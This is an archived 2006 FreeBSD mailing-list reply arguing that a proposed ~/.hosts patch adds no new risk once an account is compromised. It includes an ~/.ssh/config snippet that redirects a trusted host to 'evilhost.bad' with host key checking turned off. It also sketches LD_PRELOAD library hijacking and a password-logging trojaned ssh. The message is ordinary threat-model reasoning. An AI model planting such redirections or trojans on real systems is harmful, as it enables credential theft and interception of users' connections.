From owner-freebsd-current@FreeBSD.ORG  Wed Jun 21 14:57:18 2006
Return-Path: <owner-freebsd-current@FreeBSD.ORG>
X-Original-To: freebsd-current@freebsd.org
Delivered-To: freebsd-current@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id 993FE16A47D
	for <freebsd-current@freebsd.org>; Wed, 21 Jun 2006 14:57:18 +0000 (UTC)
	(envelope-from craig@xfoil.gank.org)
Received: from ion.gank.org (ion.gank.org [69.55.238.164])
	by mx1.FreeBSD.org (Postfix) with ESMTP id 30E7D43D46
	for <freebsd-current@freebsd.org>; Wed, 21 Jun 2006 14:57:15 +0000 (GMT)
	(envelope-from craig@xfoil.gank.org)
Received: by ion.gank.org (Postfix, from userid 1001)
	id 4A7CA115F1; Wed, 21 Jun 2006 09:57:14 -0500 (CDT)
Date: Wed, 21 Jun 2006 09:57:10 -0500
From: Craig Boston <craig@xfoil.gank.org>
To: Peter Ross <Peter.Ross@alumni.tu-berlin.de>
Message-ID: <20060621145710.GA12942@nowhere>
Mail-Followup-To: Craig Boston <craig@xfoil.gank.org>,
	Peter Ross <Peter.Ross@alumni.tu-berlin.de>,
	Brooks Davis <brooks@one-eyed-alien.net>,
	Mike Jakubik <mikej@rogers.com>,
	"freebsd-current@freebsd.org" <freebsd-current@freebsd.org>,
	Justin Hibbits <jrh29@eecs.cwru.edu>
References: <Pine.LNX.4.64.0606211658340.3151@localhost.localdomain>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.64.0606211658340.3151@localhost.localdomain>
User-Agent: Mutt/1.4.2.1i
Cc: Mike Jakubik <mikej@rogers.com>,
	"freebsd-current@freebsd.org" <freebsd-current@freebsd.org>,
	Justin Hibbits <jrh29@eecs.cwru.edu>
Subject: Re: ~/.hosts patch
X-BeenThere: freebsd-current@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Discussions about the use of FreeBSD-current
	<freebsd-current.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-current>, 
	<mailto:freebsd-current-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-current>
List-Post: <mailto:freebsd-current@freebsd.org>
List-Help: <mailto:freebsd-current-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-current>,
	<mailto:freebsd-current-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Wed, 21 Jun 2006 14:57:18 -0000

On Wed, Jun 21, 2006 at 04:59:09PM +1000, Peter Ross wrote:
> If you are able to hack your way into a machine you can write this file 
> so later attempts to connect to a remote machine can be redirected (e.g. 
> useful to get login passwords) - you do not need root access to achieve 
> it.

If you are able to hack your way into a machine you can write something
like this into ~/.ssh/config

Host goodhost
    HostKeyAlias Own3d
    StrictHostKeyChecking no
    HostName evilhost.bad

For that matter, you could add aliases to .shrc or .cshrc to run some
wrapper program instead.  Say, one that sets LD_PRELOAD=~/.libevil.so,
which contains custom gethost* functions.

Or have it run a custom ssh binary that doesn't do any host key checking
at all, or logs all passwords somewhere.

Once an account is compromised, all bets are off.  You can't assume that
DNS lookups are valid as your C library may be overridden by something
local to the account.  The login shell could be trojaned to hide the
files.  Other users would of course be unaffected (so long as you didn't
give up the root password).

I don't think the ~/.hosts idea adds any additional risk.  If anything,
a ~/.hosts compromise would be easier to detect than more complex
methods.

Craig